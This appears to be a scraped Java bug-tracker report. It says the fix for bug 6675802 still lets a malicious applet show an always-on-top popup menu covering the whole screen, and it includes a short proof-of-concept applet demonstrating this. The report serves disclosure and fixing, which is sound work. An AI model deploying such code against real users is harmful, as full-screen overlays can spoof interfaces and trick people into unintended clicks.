Relates :
|
|
Relates :
|
|
Relates :
|
|
Relates :
|
There is an oversight in the fix for 6675802. It allows a malicious applet to show an always-on-top popup menu which has the whole screen size. A code example is below: === Source Begin === import javax.swing.*; import java.awt.*; public class MaliciousApplet extends JApplet { public void start() { JPopupMenu popupMenu = new JPopupMenu(); popupMenu.add(new JMenuItem("Click")); Dimension screenSize = Toolkit.getDefaultToolkit().getScreenSize(); popupMenu.setPopupSize(screenSize); popupMenu.show(null, 0, 0); } } === Source End ===
|